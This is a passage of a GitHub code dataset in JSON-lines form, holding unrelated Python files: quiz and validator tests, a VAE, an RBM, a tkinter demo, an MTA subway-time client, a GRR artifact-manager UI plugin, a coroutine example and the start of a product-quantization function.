open('user.csv', 'a', newline = '') as f:\n write = csv.writer(f)\n write.writerow(n_user)\n\nnew_user()","repo_name":"DarkGamer1507/Project","sub_path":"quiz/main_menu.py/new_user.py","file_name":"new_user.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"70458831797","text":"from unittest import TestCase\nfrom parameterized import parameterized\nfrom TattooSalon.salon.validator import Validator\n\nclass TestValidatorTDD(TestCase):\n\n @parameterized.expand([\n [\"Кристина123\", True],\n [\"kristina@gmail.com\", True],\n [\"+34567567kris\", True],\n [\"main_admin\", True],\n [\"super-admin\", True],\n [\"#Admin123\", True],\n [\"Костя%1%1%\", True],\n [\"1*2*3*4\", True],\n [\"kristina/Mironenko\", True],\n [\"\", False],\n ])\n def test_check_login(self, input_string, expected):\n\n actual = Validator.check_login(input_string)\n\n self.assertEqual(actual, expected)\n\n\nclass TestIntegrated(TestCase):\n\n def test_addToCart_AddToCart_DeleteFromCart_ExceptedTrue(self):\n self.assertEqual(True, True)\n def test_CheckOnValidLoginAndValidPasswordExceptTrue(self):\n self.assertEqual(True, True)","repo_name":"xlebyshek17/TattoSalon","sub_path":"TattooSalon/salon/tests/test_tdd.py","file_name":"test_tdd.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"37848335882","text":"import matplotlib.pyplot as plt\nf = open('mouse.csv', 'r').read()\ndatasets = f.split('\\n')\n# get 4 corners \nfor i in range(6,len(datasets)- 2,2):\n ydata = datasets[i].split(',')\n ylabel = ydata[0]\n y = list(map(float, ydata[1:]))\n \n i = i + 1\n \n xdata = datasets[i].split(',')\n xlabel = xdata[0]\n x = list(map(float, xdata[1:]))\n line, = plt.plot(x,y, color='g')\n line.set_label(ylabel)\n\n if \"Bottom Right\" in ylabel:\n peaks = []\n threshold= -0.7\n ind = 0\n for j in range(len(y)):\n if y[j] > threshold:\n print(x[j], y[j])\n peaks.append(x[j])\n \n \nmouse_data = datasets[len(datasets)-2].split(',')\nmouse_label = mouse_data[0]\nmouse_timestamps = list(map(float, mouse_data[1:]))\nplt.axhline(threshold, color = 'r', label = \"Threshold\")\ndistances = []\nimport math\nmouse_label_added = False\nfor m in mouse_timestamps:\n d = 10000\n r_d = 0\n for p in peaks:\n _d = math.sqrt((m -p)**2)\n if d > _d:\n d = _d\n r_d = p-m\n distances.append(r_d)\n if mouse_label_added:\n plt.axvline(m)\n else:\n plt.axvline(m, label = mouse_label)\n mouse_label_added = True\n\nplt.legend()\nprint(distances)\nm = sum(distances)/len(distances)\ndeviations = list(map(lambda x : (x - m) **2, distances))\nprint(deviations)\nstd = math.sqrt(sum(deviations)/len(deviations))\nprint(m, std)#-36.61435555749055 16.73778306287719\nplt.show()\n\n\n\n","repo_name":"colonbrack3t/Final-Year-Project","sub_path":"VR Balance Board Calibration project/Assets/BalanceBoard/plot_mouse.py","file_name":"plot_mouse.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"33721663376","text":"import torch\nimport torch.nn as nn\n\n# vae更新代码,更新点在于 mu与logvar 通过两个神经网络分别得出\nclass VAE_new(nn.Module):\n def __init__(self):\n super(VAE_new, self).__init__()\n self.fc1 = nn.Linear(784,256)\n self.fc2 = nn.Linear(256,64)\n self.fc31 = nn.Linear(64,10)\n self.fc32 = nn.Linear(64,10)\n self.relu = nn.ReLU()\n self.decoder = nn.Sequential(\n nn.Linear(10,64),\n nn.ReLU(),\n nn.Linear(64,256),\n nn.ReLU(),\n nn.Linear(256,784),\n nn.Sigmoid()\n )\n\n def encoder(self,x):\n h1 = self.relu(self.fc1(x))\n h2 = self.relu(self.fc2(h1))\n\n return self.relu(self.fc31(h2)),self.relu(self.fc32(h2))\n\n def reparamtrize(self,mu,logvar):\n return mu + logvar * torch.randn_like(logvar)\n\n def forward(self,x):\n batch_size = x.size(0)\n # flatten\n x = x.view(batch_size,784)\n mu,logvar = self.encoder(x)\n h_ = self.reparamtrize(mu,logvar)\n x_hat = self.decoder(h_)\n x_hat = x_hat.view(batch_size,1,28,28)\n\n # KL divergence\n # 因为我们想要逼近的是 N~(0,1) 所以 mu2=0,sigma2 = 1\n kld = 0.5 * torch.sum(\n torch.pow(mu, 2) +\n torch.pow(logvar, 2) -\n torch.log(1e-8 + torch.pow(logvar, 2)) - 1\n ) / (batch_size * 28 * 28)\n\n return x_hat,kld\n\n\n\n","repo_name":"sjt5285126/GridVGAE_system","sub_path":"autocoder/vae_update.py","file_name":"vae_update.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"17166870690","text":"import tkinter as tk\n\nclass Tag(tk.Tk):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.title(\"Tags\")\n\t\tself.text = tk.Text(self)\n\t\tself.text.pack(side=tk.TOP,fill='y')\n\t\t\n\t\tself.text.bind('',self.configuring_tags,'')# the empty string option means that the function should replace any other binding of the same shorcut key\n\n\t\tself.text.bind('',self.raise_selected)\n\t\tself.text.bind('',self.underline_selected)\n\t\tself.text.bind('',self.duplicate_text)\n\n\t\tself.text.bind('',self.search_word)\n\t\t\n\n\tdef configuring_tags(self,event = None):\n\t\tlineend = self.text.index(tk.INSERT)\n\t\tlineend = lineend.split('.')\n\t\tlineend = int(lineend[1])\n\t\tfor i in range(lineend):\n\t\t\tindex = '1.'+str(i)\n\t\t\tend= '1.end'\n\t\t\tself.text.tag_add('even',index,end)# args are: call tag,start_point of the tag, end point of the tag\n\t\tself.text.tag_configure('even',foreground= 'green')# args are: create tag,what the tag should affect \n\n\tdef raise_selected(self,event=None):\n\t\t\n\t\tselected_pos = self.text.tag_ranges('sel')# the range of the selection u made. returns a list of elements: starting index and ending index of the selected area\n\n\t\ttry:\n\t\t\tself.text.tag_add('raise',selected_pos[0],selected_pos[1])\n\t\texcept:#to prevent an error incase there is no selected area\n\t\t\tpass \n\t\tself.text.tag_configure('raise',offset=5)# the offset raises the selected text\n\n\t\treturn 'break' # overwrites any default event of the selected shorcut key\n\tdef underline_selected(self,event=None):\n\t\tself.text.tag_configure('underline',underline=1)\n\t\tselected_pos = self.text.tag_ranges('sel')# the range of the selection u made. returns a list of elements: starting index and ending index of the selected area\n\n\t\ttry:\n\t\t\tself.text.tag_add('underline',selected_pos[0],selected_pos[1])\n\t\texcept:\n\t\t\tpass\n\t\t\n\n\t\treturn 'break' # overwrites any default event of the selected shorcut key\n\n\t# duplicating a text\n\tdef duplicate_text(self,event):\n\t\tcursor_pos = self.text.index(tk.INSERT)\n\t\tcursor_pos = cursor_pos.split('.')\n\t\t\n\t\tselected_area = self.text.tag_ranges('sel')\n\t\tnew_pos = str(selected_area[1])\n\t\t\n\t\tnew_pos = new_pos.split('.')\n\t\t\n\t\tnew_pos = str(int(new_pos[0])+1)+'.0'\n\t\t\n\n\t\ttext_copy = self.text.get(selected_area[0],selected_area[1]) # returns the text within this indexes\n\t\t\n\n\t\tself.text.insert(new_pos,'\\n'+text_copy)\n\t\treturn 'break'\n\n\tdef search_word(self,event):\n\t\tself.text.tag_configure('color',foreground='purple')\n\t\tstart = 1.0\n\t\tidx = self.text.search('python',start,stopindex=tk.END)\n\t\twhile idx:\n\t\t\ttag_begin = idx\n\t\t\ttag_end = f'{idx}+6c'\n\t\t\tself.text.tag_add('color',tag_begin,tag_end)\n\n\t\t\tstart = tag_end\n\t\t\tidx = self.text.search('python',start,stopindex = tk.END)\n\n\n\t\nif __name__ == '__main__':\n\ttag = Tag()\n\ttag.mainloop()\n","repo_name":"jaykayudo/Flotex","sub_path":"demos/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"9888255306","text":"'''\nRestricted Boltzmann Machines\n'''\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow.contrib.eager as tfe\nfrom utils import sample_from_bernoulli, tf_xavier_init\n\n\nclass RBM():\n\n def __init__(self, vis_dim, hid_dim, w=None, vis_b=None, hid_b=None):\n self.vis_dim = vis_dim\n self.hid_dim = hid_dim\n if w is not None:\n self.w = w\n else:\n self.w = tfe.Variable(\n tf_xavier_init(self.vis_dim, self.hid_dim, const=4.0),\n name='rbm.w')\n if hid_b is not None:\n self.hid_b = hid_b\n else:\n self.hid_b = tfe.Variable(\n tf.zeros([self.hid_dim]), dtype=tf.float32, name='rbm.hid_b')\n if vis_b is not None:\n self.vis_b = vis_b\n else:\n self.vis_b = tfe.Variable(\n tf.zeros([self.vis_dim]), dtype=tf.float32, name='rbm.vis_b')\n\n # conditional distributions\n def vis2hid(self, v):\n return tf.nn.sigmoid(tf.matmul(v, self.w) + self.hid_b)\n\n def hid2vis(self, h):\n return tf.nn.sigmoid(tf.matmul(h, tf.transpose(self.w)) + self.vis_b)\n\n # Gibbs steps\n def gibbs_vhv(self, v_0):\n h_1 = sample_from_bernoulli(self.vis2hid(v_0))\n v_1 = sample_from_bernoulli(self.hid2vis(h_1))\n return h_1, v_1\n\n def gibbs_hvh(self, h_0):\n v_1 = sample_from_bernoulli(self.hid2vis(h_0))\n h_1 = sample_from_bernoulli(self.vis2hid(v_1))\n return v_1, h_1\n\n # marginalization\n def ulogprob_vis(self, v):\n wx_b = tf.matmul(v, self.w) + self.hid_b\n vbias_term = tf.einsum('ij,j->i', v, self.vis_b)\n hidden_term = tf.reduce_sum(tf.nn.softplus(wx_b), axis=1)\n return hidden_term + vbias_term\n\n def ulogprob_hid(self, h):\n wx_b = tf.matmul(h, tf.transpose(self.w)) + self.vis_b\n hbias_term = tf.einsum('ij,j->i', h, self.hid_b)\n vis_term = tf.reduce_sum(tf.nn.softplus(wx_b), axis=1)\n return vis_term + hbias_term\n\n # log partiation function\n def log_z_summing_h(self):\n assert (self.hid_dim <= 20)\n h_all = np.arange(2**self.hid_dim, dtype=np.int32)\n h_all = ((h_all.reshape(-1, 1) &\n (2**np.arange(self.hid_dim))) != 0).astype(np.float32)\n h_all = tf.constant(h_all[:, ::-1], dtype=tf.float32)\n log_p_h = self.ulogprob_hid(h_all)\n log_z = tf.reduce_logsumexp(log_p_h, axis=0)\n return log_z\n\n def log_z_summing_v(self):\n assert (self.vis_dim <= 20)\n v_all = np.arange(2**self.vis_dim, dtype=np.int32)\n v_all = ((v_all.reshape(-1, 1) &\n (2**np.arange(self.vis_dim))) != 0).astype(np.float32)\n v_all = tf.constant(v_all[:, ::-1], dtype=tf.float32)\n log_p_v = self.ulogprob_vis(v_all)\n log_z = tf.reduce_logsumexp(log_p_v, axis=0)\n return log_z\n\n # likelihood\n def logprob_vis(self, v, log_z):\n return self.ulogprob_vis(v) - log_z\n\n def logprob_hid(self, h, log_z):\n return self.ulogprob_hid(h) - log_z\n\n # energy function\n def energy(self, h, v):\n hbias_term = tf.einsum('ij,j->i', h, self.hid_b)\n vbias_term = tf.einsum('ij,j->i', v, self.vis_b)\n weight_term = tf.reduce_sum(tf.matmul(v, self.w) * h, axis=1)\n return -(hbias_term + vbias_term + weight_term)\n\n # free energy\n def free_energy(self, v):\n return -self.ulogprob_vis(v)\n\n # free energy for debug\n def _debug_free_energy(self, v):\n assert (self.hid_dim <= 20)\n assert (v.numpy().shape == (1, self.vis_dim))\n\n h_all = np.arange(2**self.hid_dim, dtype=np.int32)\n h_all = ((h_all.reshape(-1, 1) &\n (2**np.arange(self.hid_dim))) != 0).astype(np.float32)\n h_all = tf.constant(h_all[:, ::-1], dtype=tf.float32)\n v_dup = tf.tile(v, [2**self.hid_dim, 1])\n return -tf.reduce_logsumexp(-self.energy(h_all, v), axis=0)\n\n # get samples\n def get_h_from_v(self, v, burn_in_steps=100):\n for i in xrange(burn_in_steps):\n h, v = self.gibbs_vhv(v)\n return h.numpy()\n\n def get_h(self, num_samples, burn_in_steps=1000, random=True):\n v = tf.zeros([num_samples, self.vis_dim], dtype=tf.float32)\n if random:\n v = sample_from_bernoulli(v + 0.5) # data average\n for i in xrange(burn_in_steps):\n h, v = self.gibbs_vhv(v)\n return h.numpy()\n\n def get_independent_samples(self,\n num_samples,\n burn_in_steps=100000,\n random=True,\n initial_v=None):\n if initial_v is not None:\n v = initial_v\n else:\n v = tf.zeros([num_samples, self.vis_dim], dtype=tf.float32)\n if random:\n v = sample_from_bernoulli(v + 0.2) # data average\n\n for i in xrange(burn_in_steps):\n _, v = self.gibbs_vhv(v)\n return v.numpy()\n\n def get_independent_means(self,\n num_samples,\n burn_in_steps=100000,\n random=True):\n v = tf.zeros([num_samples, self.vis_dim], dtype=tf.float32)\n if random:\n v = sample_from_bernoulli(v + 0.2) # data average\n for i in xrange(burn_in_steps):\n _, v = self.gibbs_vhv(v)\n h_1 = sample_from_bernoulli(self.vis2hid(v))\n v_1 = self.hid2vis(h_1)\n return v_1.numpy()\n\n def get_samples_single_chain(self,\n num_samples,\n adjacent_samples=10,\n steps_between_samples=1000,\n burn_in_steps=100000,\n random=True):\n assert num_samples % adjacent_samples == 0\n v = tf.zeros([1, self.vis_dim], dtype=tf.float32)\n if random:\n v = sample_from_bernoulli(v + 0.2) # data average\n for i in xrange(burn_in_steps):\n _, v = self.gibbs_vhv(v)\n sample_list = []\n for i in xrange(num_samples / adjacent_samples):\n for j in xrange(adjacent_samples):\n _, v = self.gibbs_vhv(v)\n sample_list.append(v.numpy())\n for i in xrange(steps_between_samples):\n _, v = self.gibbs_vhv(v)\n return np.vstack(sample_list)\n\n # for constrastive divergence training\n def cd_step(self, v, train_mc_steps):\n h = sample_from_bernoulli(self.vis2hid(v))\n h_list = [\n h,\n ]\n v_list = []\n for i in xrange(train_mc_steps):\n new_v, new_h = self.gibbs_hvh(h_list[-1])\n v_list.append(new_v)\n h_list.append(new_h)\n chain_end = tf.stop_gradient(v_list[-1])\n return chain_end\n\n def pcd_step(self, v, train_mc_steps, persistent):\n h_list = [\n persistent,\n ]\n v_list = []\n for i in xrange(train_mc_steps):\n new_v, new_h = self.gibbs_hvh(h_list[-1])\n v_list.append(new_v)\n h_list.append(new_h)\n chain_end = tf.stop_gradient(v_list[-1])\n return chain_end, tf.stop_gradient(h_list[-1])\n\n def cd_loss(self, v_0, v_n):\n return tf.reduce_mean(\n self.free_energy(v_0), axis=0) - tf.reduce_mean(\n self.free_energy(v_n), axis=0)\n\n # reconstruction\n def reconstruction_error(self, v_0):\n h_1 = sample_from_bernoulli(self.vis2hid(v_0))\n v_1_logits = tf.matmul(h_1, tf.transpose(self.w)) + self.vis_b\n return tf.reduce_mean(\n tf.reduce_sum(\n tf.nn.sigmoid_cross_entropy_with_logits(\n labels=v_0, logits=v_1_logits),\n axis=1),\n axis=0)\n\n def params(self):\n return (self.hid_b, self.vis_b, self.w)\n\n\n# base rate RBM for AIS\n\n\nclass BRRBM(RBM):\n\n def __init__(self, vis_dim, hid_dim, data):\n self.vis_dim = vis_dim\n self.hid_dim = hid_dim\n self.w = tfe.Variable(tf.zeros([vis_dim, hid_dim]), dtype=tf.float32)\n self.hid_b = tfe.Variable(tf.zeros([self.hid_dim]), dtype=tf.float32)\n # MLE for the value of vis_b\n sample_mean = tf.reduce_mean(data, axis=0)\n # Smooth to make sure p(v) > 0 for every v\n sample_mean = tf.clip_by_value(sample_mean, 1e-5, 1 - 1e-5)\n self.vis_b = -tf.log(1. / sample_mean - 1.)\n self.log_z = tf.reduce_sum(\n tf.nn.softplus(self.vis_b), axis=0) + self.hid_dim * np.log(2.)\n\n # get tf samples\n def get_independent_samples_tf(self, num_samples, burn_in_steps=100):\n v = tf.zeros([num_samples, self.vis_dim], dtype=tf.float32)\n for i in xrange(burn_in_steps):\n _, v = self.gibbs_vhv(v)\n return v\n\n\n# Mix RBM for AIS\n\n\nclass MIXRBM(RBM):\n\n def tune(self, brrbm, rbm, weight):\n # adjust parameters of the mixed RBM\n n = brrbm.hid_dim\n self.vis_b = (1. - weight) * brrbm.vis_b + weight * rbm.vis_b\n self.hid_b = tf.concat(\n [(1. - weight) * brrbm.hid_b, weight * rbm.hid_b], axis=0)\n self.w = tf.concat([(1. - weight) * brrbm.w, weight * rbm.w], axis=1)\n","repo_name":"DoubleBlindReviewShareCode/anonymous_link_AdVIL_code","sub_path":"RBM.py","file_name":"RBM.py","file_ext":"py","file_size_in_byte":9258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"8170625834","text":"import os, requests, time\n\nimport datetime\nfrom google.transit import gtfs_realtime_pb2\nfrom dotenv import load_dotenv, find_dotenv\nfrom protobuf_to_dict import protobuf_to_dict\n\n\nMTA_URL = 'http://datamine.mta.info/mta_esi.php'\nTIMES_TO_GET = 6\n\n\nclass TrainInfo:\n def __init__(self, api_key, feed_id, station):\n self.api_key = api_key\n self.feed_id = feed_id\n self.station = station\n self.feed_message = gtfs_realtime_pb2.FeedMessage()\n \n @staticmethod\n def get_train_time_with_label(train, arrival_time, now):\n minutes_until_train = (arrival_time - int(now)) // 60\n minutes = \"{}\".format(minutes_until_train)\n return \"{}: {}\".format(train, minutes)\n\n @staticmethod\n def get_train_time_minutes(arrival_time, now):\n minutes_until_train = (arrival_time - int(now)) // 60\n return \"{}\".format(minutes_until_train)\n\n @staticmethod\n def format_train_time(arrival_time):\n arrival_time = time.localtime(arrival_time)\n return time.strftime(\"%H:%M\", arrival_time)\n\n def get_train_time_data(self, train_data):\n train_time_data = list()\n for trains in train_data:\n trip_update = trains.get('trip_update')\n if not trip_update:\n continue\n\n route_id = trip_update['trip']['route_id']\n\n stop_time_update = trip_update['stop_time_update']\n for stop_info in stop_time_update:\n if stop_info.get('stop_id') == self.station:\n arrival = stop_info.get('arrival')\n if not arrival:\n continue\n train_time_data.append((route_id, arrival['time']))\n return train_time_data\n\n def get_train_time_strings(self, train_time_data):\n if len(train_time_data) < 1:\n return 'no times'\n\n train_time_data.sort(key=lambda route_time: route_time[1])\n\n now = time.time()\n\n train_output = list()\n\n for i, train_arrival_time in enumerate(train_time_data[:TIMES_TO_GET]):\n train, arrival_time = train_arrival_time\n minutes_until_arrival = (arrival_time - int(now)) / 60\n if minutes_until_arrival < 1:\n continue\n\n train_output.append(self.format_train_time(arrival_time))\n\n return ' '.join(train_output) + ' '\n\n def get_train_identifiers_for_all_feeds(self):\n def get_train_ids(feed_entities):\n for entity in feed_entities:\n trip_update = entity.get('trip_update')\n if not trip_update:\n continue\n trip = trip_update['trip']\n if not trip:\n continue\n route_id = trip.get('route_id')\n if route_id:\n yield route_id\n\n possible_feed_ids = range(1, 60)\n\n for feed_id in possible_feed_ids:\n feed = self.get_feed(feed_id=feed_id)\n if feed:\n train_ids = ','.join(set(get_train_ids(feed)))\n yield 'feed_id={}: {}'.format(feed_id, train_ids)\n\n def get_train_text(self):\n feed = self.get_feed()\n if not feed:\n # TODO log an exception\n return\n train_time_data = self.get_train_time_data(feed)\n return self.get_train_time_strings(train_time_data)\n\n def get_feed(self, feed_id=None):\n feed_id = feed_id or self.feed_id\n query_str = '?key={}&feed_id={}'.format(\n self.api_key, feed_id\n )\n response = requests.get(MTA_URL + query_str)\n\n try:\n self.feed_message.ParseFromString(response.content)\n subway_feed = protobuf_to_dict(self.feed_message)\n return subway_feed['entity']\n except Exception:\n return\n\n\nif __name__ == \"__main__\":\n load_dotenv(find_dotenv())\n MTA_API_KEY = os.environ['MTA_API_KEY']\n FEED_IDS = os.environ['FEED_IDS'].split(',')\n STATIONS = os.environ['STOPS'].split(',')\n\n if True: # TODO add flag\n for feed_id, station in zip(FEED_IDS, STATIONS):\n ti = TrainInfo(api_key=MTA_API_KEY,\n feed_id=feed_id,\n station=station)\n print(ti.get_train_text())\n else:\n ti = TrainInfo(api_key=MTA_API_KEY, feed_id=None, station=None)\n print('\\n'.join(list(ti.get_train_identifiers_for_all_feeds())))\n\n\n","repo_name":"redSlug/weather-reporter","sub_path":"server/client/train_info.py","file_name":"train_info.py","file_ext":"py","file_size_in_byte":4456,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"4"} +{"seq_id":"19884063900","text":"#!/usr/bin/env python\n\"\"\"This plugin adds artifact functionality to the UI.\"\"\"\n\nimport itertools\nimport StringIO\n\nfrom grr.gui import renderers\nfrom grr.gui.plugins import fileview\nfrom grr.gui.plugins import forms\nfrom grr.gui.plugins import semantic\nfrom grr.lib import aff4\nfrom grr.lib import artifact\nfrom grr.lib import artifact_lib\nfrom grr.lib import parsers\nfrom grr.lib import rdfvalue\n\n\nclass ArtifactListRenderer(forms.MultiSelectListRenderer):\n \"\"\"Renderer for listing the available Artifacts.\"\"\"\n\n type = rdfvalue.ArtifactName\n\n artifact_template = (\"\"\"\n
    \n

    \n
    \n \n \n \n \n \n \n \n
    Labels
    Platforms
    Conditions
    Dependencies
    Links
    Output Type
    \n
    Artifact Collectors
    \n \n \n
    \n
    Artifact Processors
    \n \n \n
    \n
    \"\"\")\n\n layout_template = (\n \"\"\"
    \"\"\"\n + forms.TypeDescriptorFormRenderer.default_description_view + \"\"\"\n
    \n
    \n \n \n \n \n \n \n \n
    \n
    \n
    \n \n
    \n \n \"\"\"\n + artifact_template + \"\"\"\n
    \n Add\n Add all \n \n Clear\n Remove \n \n
    \n
    \n
    \n\n
    \n\"\"\")\n\n def Layout(self, request, response):\n \"\"\"Get available artifact information for display.\"\"\"\n # Get all artifacts that aren't Bootstrap and aren't the base class.\n self.artifacts = {}\n artifact.LoadArtifactsFromDatastore(token=request.token)\n for name, artifact_val in artifact_lib.ArtifactRegistry.artifacts.items():\n if set([\"Bootstrap\"]).isdisjoint(artifact_val.labels):\n self.artifacts[name] = artifact_val\n self.labels = artifact_lib.ARTIFACT_LABELS\n\n # Convert artifacts into a dict usable from javascript.\n artifact_dict = {}\n for artifact_name, artifact_val in self.artifacts.items():\n artifact_dict[artifact_name] = artifact_val.ToExtendedDict()\n processors = []\n for processor in parsers.Parser.GetClassesByArtifact(artifact_name):\n processors.append({\"name\": processor.__name__,\n \"output_types\": processor.output_types,\n \"doc\": processor.GetDescription()})\n artifact_dict[artifact_name][\"processors\"] = processors\n\n # Skip the our parent and call the TypeDescriptorFormRenderer direct.\n response = renderers.TypeDescriptorFormRenderer.Layout(self, request,\n response)\n return self.CallJavascript(response, \"ArtifactListRenderer.Layout\",\n prefix=self.prefix,\n artifacts=artifact_dict,\n supported_os=artifact_lib.SUPPORTED_OS_LIST,\n labels=self.labels)\n\n\nclass ArtifactRDFValueRenderer(semantic.RDFValueRenderer):\n \"\"\"A special renderer for ArtifactRDFValues.\"\"\"\n\n classname = \"Artifact\"\n\n layout_template = renderers.Template(\n \"\"\"\n
    \"\"\"\n + ArtifactListRenderer.artifact_template + \"\"\"\n
    \n\"\"\")\n\n def Layout(self, request, response):\n self.artifact_str = self.proxy.ToPrettyJson()\n response = super(ArtifactRDFValueRenderer, self).Layout(request, response)\n return self.CallJavascript(response, \"ArtifactRDFValueRenderer.Layout\",\n artifact_str=self.artifact_str)\n\n\nclass ArtifactRawRDFValueRenderer(semantic.RDFValueRenderer):\n \"\"\"A renderer for showing JSON format for ArtifactRDFValues.\"\"\"\n\n classname = \"Artifact\"\n\n layout_template = renderers.Template(\n \"
    {{this.artifact_str|escape}}
    \")\n\n def Layout(self, request, response):\n self.artifact_str = self.proxy.ToPrettyJson(extended=True)\n super(ArtifactRawRDFValueRenderer, self).Layout(request, response)\n\n\nclass ArtifactManagerView(renderers.TableRenderer):\n \"\"\"Artifact Manager table with toolbar.\"\"\"\n\n description = \"Artifact Manager\"\n behaviours = frozenset([\"Configuration\"])\n order = 50\n\n toolbar = \"ArtifactManagerToolbar\"\n\n def __init__(self, **kwargs):\n super(ArtifactManagerView, self).__init__(**kwargs)\n self.AddColumn(semantic.RDFValueColumn(\"Artifact Name\", width=\"5%\"))\n self.AddColumn(semantic.RDFValueColumn(\n \"Artifact Details\", width=\"50%\", renderer=ArtifactRDFValueRenderer))\n self.AddColumn(semantic.RDFValueColumn(\n \"Artifact Raw\", width=\"40%\", renderer=ArtifactRawRDFValueRenderer))\n\n def BuildTable(self, start_row, end_row, request):\n \"\"\"Builds table artifacts.\"\"\"\n artifact_urn = rdfvalue.RDFURN(\"aff4:/artifact_store\")\n try:\n collection = aff4.FACTORY.Open(artifact_urn,\n aff4_type=\"RDFValueCollection\",\n token=request.token)\n except IOError:\n return\n\n self.size = len(collection)\n row_index = start_row\n for value in itertools.islice(collection, start_row, end_row):\n self.AddCell(row_index, \"Artifact Name\", value.name)\n self.AddCell(row_index, \"Artifact Details\", value)\n self.AddCell(row_index, \"Artifact Raw\", value)\n row_index += 1\n\n def Layout(self, request, response):\n \"\"\"Populate the table state with the request.\"\"\"\n if self.toolbar:\n tb_cls = renderers.Renderer.classes[self.toolbar]\n tb_cls().Layout(request, response)\n return super(ArtifactManagerView, self).Layout(request, response)\n\n\nclass ArtifactManagerToolbar(renderers.TemplateRenderer):\n \"\"\"A navigation enhancing toolbar.\n\n Internal State:\n - aff4_path: The path we are viewing now in the table.\n \"\"\"\n post_parameters = [\"aff4_path\"]\n event_queue = \"file_select\"\n\n layout_template = renderers.Template(\"\"\"\n
      \n
    • \n \n\n \n
    • \n\n
    \n\n
    \n
    \n
    \n
    \n \n

    Upload File

    \n
    \n
    \n
    \n \n
    \n
    \n
    \n
    \n\n
    \n
    \n\n\"\"\")\n\n def Layout(self, request, response):\n response = super(ArtifactManagerToolbar, self).Layout(request, response)\n return self.CallJavascript(response, \"ArtifactManagerToolbar.Layout\")\n\n\nclass DeleteArtifactsConfirmationDialog(renderers.ConfirmationDialogRenderer):\n \"\"\"Dialog that asks for confirmation to delete uploaded artifacts.\n\n Note that this only deletes artifacts that have been uploaded via the\n ArtifactManager. Artifacts loaded from the artifacts directory are\n unaffected.\n \"\"\"\n\n content_template = renderers.Template(\"\"\"\n

    Are you sure you want to delete all\nuploaded artifacts?

    \n\"\"\")\n\n ajax_template = renderers.Template(\"\"\"\n

    Uploaded artifacts were deleted successfully.

    \n\"\"\")\n\n def RenderAjax(self, request, response):\n aff4.FACTORY.Delete(\"aff4:/artifact_store\", token=request.token)\n return self.RenderFromTemplate(self.ajax_template, response,\n unique=self.unique, this=self)\n\n\nclass ArtifactJsonUploadView(fileview.UploadView):\n \"\"\"Renders a binary upload page.\"\"\"\n post_parameters = []\n upload_handler = \"ArtifactUploadHandler\"\n storage_path = \"aff4:/artifact_store\"\n\n\nclass ArtifactUploadHandler(fileview.UploadHandler):\n \"\"\"Handles upload of a binary config file such as a driver.\"\"\"\n\n def RenderAjax(self, request, response):\n \"\"\"Handle the upload via ajax.\"\"\"\n try:\n self.uploaded_file = request.FILES.items()[0][1]\n content = StringIO.StringIO()\n for chunk in self.uploaded_file.chunks():\n content.write(chunk)\n self.dest_path = artifact.UploadArtifactYamlFile(\n content.getvalue(), token=request.token)\n\n return renderers.TemplateRenderer.Layout(self, request, response,\n self.success_template)\n except (IOError, artifact_lib.ArtifactDefinitionError) as e:\n self.error = \"Could not write artifact to database %s\" % e\n return renderers.TemplateRenderer.Layout(self, request, response,\n self.error_template)\n","repo_name":"ForensicTools/GRREAT-475_2141-Chaigon-Failey-Siebert","sub_path":"gui/plugins/artifact_view.py","file_name":"artifact_view.py","file_ext":"py","file_size_in_byte":10809,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"4"} +{"seq_id":"20435045990","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n# coding=utf8\n\n\"\"\"\nPython协程示例\n\"\"\"\n\n\ndef display():\n r = ''\n while True:\n n = yield r # 获取send的参数n,并且返回r\n\n if not n:\n return\n print('[----]display %d' % n)\n r = 'Next'\n print('You can not see me.')\n\n\ndef sendMessage(c):\n c.send(None) # 启动生成器\n n = 0\n while n < 5:\n n = n + 1\n print('[SEND]send %d' % n)\n r = c.send(n)\n print('[SEND]get: %s' % r)\n c.close()\n\n\ndef demo1():\n d = display # 和协程用法无关,仅为对比\n print(d) # \n\n c = display() # 因为函数里包含yield,因此这里解释器并不会掉用(也并不是获取函数指针)\n print(c) # \n sendMessage(c)\n\n\nif __name__ == '__main__':\n demo1()\n","repo_name":"pengyuwei/learning-backend","sub_path":"python/thread/coroutines.py","file_name":"coroutines.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"19414389966","text":"import numpy as np\r\nimport pickle\r\nimport time\r\n\r\n\r\ndef pq(data, P, init_centroids, max_iter):\r\n def Split_P_data(Data_File, p):\r\n data = np.array(Data_File)\r\n data = np.array_split(data, p, axis=1)\r\n return data\r\n\r\n def Update_centr(p, centroids, data, N_cluster):\r\n for i_p in range(p):\r\n for j_index, j_row in enumerate(data[i_p]):\r\n # one of data to all centers distance\r\n one_L1_dis = np.sum(abs(centroids[i_p] - j_row), axis=1)\r\n one_L1 = np.where(one_L1_dis == np.min(one_L1_dis, axis=0))\r\n N_cluster[i_p][j_index] = one_L1[0][0]\r\n for i_p in range(p):\r\n for j_index, j_row in enumerate(centroids[i_p]):\r\n indexs = np.where(N_cluster[i_p] == j_index)\r\n if len(indexs[0]) == 0:\r\n continue\r\n else:\r\n for d_index, d in enumerate(indexs[0]):\r\n if d_index == 0:\r\n line = np.array([data[i_p][d]])\r\n else:\r\n line = np.vstack((line, data[i_p][d]))\r\n # update onelne of centroid\r\n centroids[i_p][j_index] = np.median(line, axis=0)\r\n return centroids, N_cluster\r\n\r\n def K_means(p, centroids, data, N_cluster, max_iter):\r\n for i in 